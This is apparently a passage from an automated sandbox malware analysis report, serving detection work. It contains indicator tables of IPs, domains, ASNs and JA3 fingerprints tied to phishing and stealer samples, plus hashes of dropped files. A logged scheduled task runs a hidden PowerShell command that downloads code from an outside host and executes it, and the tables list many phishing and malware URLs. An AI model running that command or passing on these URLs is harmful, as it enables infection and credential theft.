                                                                                                                      12:58:25API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                      18:58:28Task SchedulerRun new task: LocalMCleaner path: Powershell s>-WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell

                                                                                                                      LLM Input / Output

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      172.67.149.9https://gamma.app/docs/Emma-Hutchison-Shared-HorseBack2300450-HorseBackUK-01032024-idiporrv2rfsc1zGet hashmaliciousHTMLPhisher, HtmlDropperBrowse
                                                                                                                        https://supply-chain.my.canva.site/blue-heronGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                          239.255.255.250Sv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                            http://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                              https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                  https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                    http://servicesnaustraliagov.info/adminGet hashmaliciousUnknownBrowse
                                                                                                                                      https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                        https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                          https://serrespec.weebly.com/tc2000-stock-charting-software.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                            https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                              188.114.97.3Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                              • www.rtprajalojago.live/7vun/
                                                                                                                                              inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                              • joxi.net/4Ak49WQH0GE3Nr.mp3
                                                                                                                                              http://meta.case-page-appeal.eu/community-standard/208273899187123/Get hashmaliciousUnknownBrowse
                                                                                                                                              • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                                                                                              9q24V7OSys.exeGet hashmaliciousFormBookBrowse
                                                                                                                                              • www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
                                                                                                                                              QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                              • filetransfer.io/data-package/mfctuvFf/download
                                                                                                                                              http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                              • brawllstars.ru/
                                                                                                                                              http://aktiivasi-paylaterr.from-resmi.com/Get hashmaliciousUnknownBrowse
                                                                                                                                              • aktiivasi-paylaterr.from-resmi.com/
                                                                                                                                              ECChG5eWfZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                              • homker11.uebki.one/GeneratorTest.php
                                                                                                                                              HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                                                                                                              • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                                                                                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                              • filetransfer.io/data-package/Ky4pZ0WB/download
                                                                                                                                              172.67.132.65https://www.google.se/amp/s/brief-beak-14b.notion.site/Accounting-4-U-e5c22e5a50ee496eb2376c15d363fa46?pvs=4Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                162.159.135.234Sv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                  http://bafybeid2klgyiphng6ifws5s35aor57wfi3so6koe2w4ggoacn6gqghegm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                                                    https://bafybeid655cmhe6uwb6wx3qrnokcfyddv63kcnzkm3whfn2xbjyyhukh2m.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                                                      http://via.evove.topGet hashmaliciousUnknownBrowse
                                                                                                                                                        test.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          windisc.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                            SecuriteInfo.com.Other.Malware-gen.12648.25881.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                SecuriteInfo.com.Win64.SpywareX-gen.2363.7900.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  ChromeInstallerOnline.exeGet hashmaliciousDicrord RatBrowse

                                                                                                                                                                    Domains

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    me-ycpi-cf-www.g06.yahoodns.nethttps://attofficialvalidation.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 87.248.119.251
                                                                                                                                                                    https://currently8220.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 87.248.119.251
                                                                                                                                                                    http://loginscrecghjk.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 87.248.119.251
                                                                                                                                                                    http://currentlyatt57update.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 87.248.119.251
                                                                                                                                                                    http://currently1980.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 87.248.119.252
                                                                                                                                                                    http://currently6600.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 87.248.119.251
                                                                                                                                                                    https://tu4att.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 87.248.119.252
                                                                                                                                                                    http://currently9876.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 87.248.119.252
                                                                                                                                                                    https://aac4b0887827b3598989c48a201d0420.crimachado.com.br/wehrgiwfbfeifef/djbfhokefbwuwrjow/djhfeokhrwihfekljd/bnpheWVkaUBzdGMuY29tLnNhGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 87.248.119.251
                                                                                                                                                                    https://currently431.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 87.248.119.252
                                                                                                                                                                    gateway.discord.ggSv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 162.159.136.234
                                                                                                                                                                    https://mjj.aigc369.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 162.159.133.234
                                                                                                                                                                    http://relay.csgoze520.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 162.159.136.234
                                                                                                                                                                    Client-built.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                    • 162.159.130.234
                                                                                                                                                                    Client-built.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                    • 162.159.133.234
                                                                                                                                                                    87Bym0x4Fy.exeGet hashmaliciousBlank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                                                    • 162.159.130.234
                                                                                                                                                                    Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                    • 162.159.134.234
                                                                                                                                                                    Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                    • 162.159.133.234
                                                                                                                                                                    QMGuBtu724.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 162.159.133.234

                                                                                                                                                                    ASNs

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    CLOUDFLARENETUSSv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    http://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                    HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.21.1.169
                                                                                                                                                                    4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    CLOUDFLARENETUSSv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    http://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                    HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.21.1.169
                                                                                                                                                                    4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    CYBERNET-APCyberInternetServicesPvtLtdPKSv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 203.101.184.86
                                                                                                                                                                    firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 124.29.195.152
                                                                                                                                                                    xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 58.65.218.110
                                                                                                                                                                    LisectAVT_2403002B_136.dllGet hashmaliciousEmotetBrowse
                                                                                                                                                                    • 175.107.196.192
                                                                                                                                                                    RiI7W2cj7p.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 175.107.255.200
                                                                                                                                                                    SHIPMENT-CMA CGM-1DBSIE1P-DOCX.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                    • 72.255.53.7
                                                                                                                                                                    SHIPMENT-CMA CGM XIAMEN-1DBSIE1PL- EX1-DOCX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 72.255.53.7
                                                                                                                                                                    rCjg912Ssb.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                    • 103.213.114.223
                                                                                                                                                                    Scanned Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 72.255.53.7
                                                                                                                                                                    Newly Arrived Shipping Document.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 72.255.53.7
                                                                                                                                                                    CLOUDFLARENETUSSv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    http://oiut-hbhgvgcvgcfcfcxbh.s3-website.us-east-2.amazonaws.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                    HdXeCzyZD9.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    NCTSgL4t0B.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    4tXm5yPtiy.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.21.1.169
                                                                                                                                                                    4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    28a2c9bd18a11de089ef85a160da29e4U7TJ7Rq13y.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 52.165.165.26
                                                                                                                                                                    Sv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 52.165.165.26
                                                                                                                                                                    https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 52.165.165.26
                                                                                                                                                                    https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 52.165.165.26
                                                                                                                                                                    http://servicesnaustraliagov.info/adminGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 52.165.165.26
                                                                                                                                                                    https://serrespec.weebly.com/tc2000-stock-charting-software.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 52.165.165.26
                                                                                                                                                                    https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 52.165.165.26
                                                                                                                                                                    http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 52.165.165.26
                                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 52.165.165.26
                                                                                                                                                                    Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 52.165.165.26
                                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eU7TJ7Rq13y.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 172.67.149.9
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    Sv6eQZzG0Z.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 172.67.149.9
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                    • 172.67.149.9
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 172.67.149.9
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    https://formacionadieste.com.de/Vrvz/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 172.67.149.9
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    file.exeGet hashmaliciousXWorm, XmrigBrowse
                                                                                                                                                                    • 172.67.149.9
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 172.67.149.9
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 172.67.149.9
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    3140, EUR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 172.67.149.9
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    • 162.159.135.234
                                                                                                                                                                    UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                    • 172.67.149.9
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    • 162.159.135.234

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    No context

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                    Entropy (8bit):0.7354991854739628
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqC:2JIB/wUKUKQncEmYRTwh0y
                                                                                                                                                                    MD5:9CA6288E77BA0F0FB13CB864E30310A2
                                                                                                                                                                    SHA1:EB427A7B9F5EDF54384E904AE1B965C26A29EE94
                                                                                                                                                                    SHA-256:17511B9D954AE2689DBAFC39F28E62E065C94F05F483BC1F9A28091413CCBF39
                                                                                                                                                                    SHA-512:7BC4C24EDDF36DB2764FF2D29EE66B4C4E5671316C1A3E229463891FEE1713019AB3D3569C05DC4CB5CB8A8F61B085CAF2B86B586307AF005B05CF0326CF05C4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x67b4f964, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                    Entropy (8bit):0.7900162886100845
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii
                                                                                                                                                                    MD5:DF0131116EEFCF97C90613331FD0E4A5
                                                                                                                                                                    SHA1:AFEA8FE6EE560A4F63F464DCC86D7B11EC55A2CA
                                                                                                                                                                    SHA-256:CC484FE56935A4491CCDDC165ECB96A2DF1EE9E62795F7E6755A179D411D160B
                                                                                                                                                                    SHA-512:75E5D58ACC27F632F127F3B2A0137ACE1B244FF15CCA567277DDB3DDF429142ACC9898ED6C05B57F5EF21057DFCE96771E19FB446C65B71321F5BF08ED6D627D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:g..d... ...............X\...;...{......................0.`.....42...{5..:...|I.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................?...:...|I.................]Yy..:...|I..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                    Entropy (8bit):0.08239311852983172
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:NAlll/KYeLK+Xilqt/57Dek3JaHyUltallEqW3l/TjzzQ/t:NAl/KzLsAR3tq4md8/
                                                                                                                                                                    MD5:8D5B95032E84FBE5D51522CC89E84652
                                                                                                                                                                    SHA1:9F1DBF169071D594395250788627E6631918DEE2
                                                                                                                                                                    SHA-256:A4C5254E02E5CF0D9E647F37C0DB5D1D51C2A4D95BDD0421044B9EED61ADC3DB
                                                                                                                                                                    SHA-512:36AFC32CD31FD9D78C73DA233A09608B124E7BCC3AA875378A0BB5386E3BBA60C4C79855989DB84F47DB79B85CBFC06E56F60903D4FF4F59795B38A9D25DE1C9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:7.F......................................;...{...:...|I.42...{5.........42...{5.42...{5...Y.42...{59................]Yy..:...|I.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):11608
                                                                                                                                                                    Entropy (8bit):4.890472898059848
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdR2Ca6pZlbjvwRjdHPRhAgkjDt4iWN3yBGHVQ9sQ:9rib4ZoopbjvwRjdvRNkjh4iUxsT6YpR
                                                                                                                                                                    MD5:6F4062C990C67D040ABC7B0F73689E66
                                                                                                                                                                    SHA1:93421F047B440E9F62456C3E2EC1E6C842DA6A80
                                                                                                                                                                    SHA-256:978EF65DE3DD792E7982FAAC8AC3C878936C94E2BCE7E17C56C604E5C68745F2
                                                                                                                                                                    SHA-512:729AB7D57FB7D3405110D7F3C33F15057FE7DFB6DBDFFD5BD1D9F13C12C6448A70D0C39BC646F74B6A38E1708318CD4AE3D9DB1EF148815E80C30EB0122EEA57
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3092
                                                                                                                                                                    Entropy (8bit):5.518768346219927
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:pQeAzlHyIFKL2O9qrh7KCDpuTJ5Eo9AdrxQgP:pO1yt2jrACluTLL2NP
                                                                                                                                                                    MD5:30209A02326996800751223641F1E24E
                                                                                                                                                                    SHA1:BAE59B4327826D9692513BBB1B724019AF8A64C5
                                                                                                                                                                    SHA-256:1FF0BEDFD8CEC06E53CF7A7E0FF4B9B8CAA7771AF4DCB604E76257814C74D6B8
                                                                                                                                                                    SHA-512:672FE9FA51EE76AB6D20289410706E5CBBB53CBC846ED5EFAC7B92F661F02FC2C10004B8533A45AAD6A484B2CD03290300B786767F31C98DDEAFBDB886B3B46D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:@...e................................................@..........H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1324
                                                                                                                                                                    Entropy (8bit):5.401483527381133
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:32SKco4KmM6GjKbmuuo+mN1s4RPQoUxqr9t7J0gt/NKCpnd+9N9rGTNk:GSU4Yymdo+ms4RIoUxqr9tK8NLpk9N9v
                                                                                                                                                                    MD5:FD80B32BF823DE55A17B8220B80F6DCB
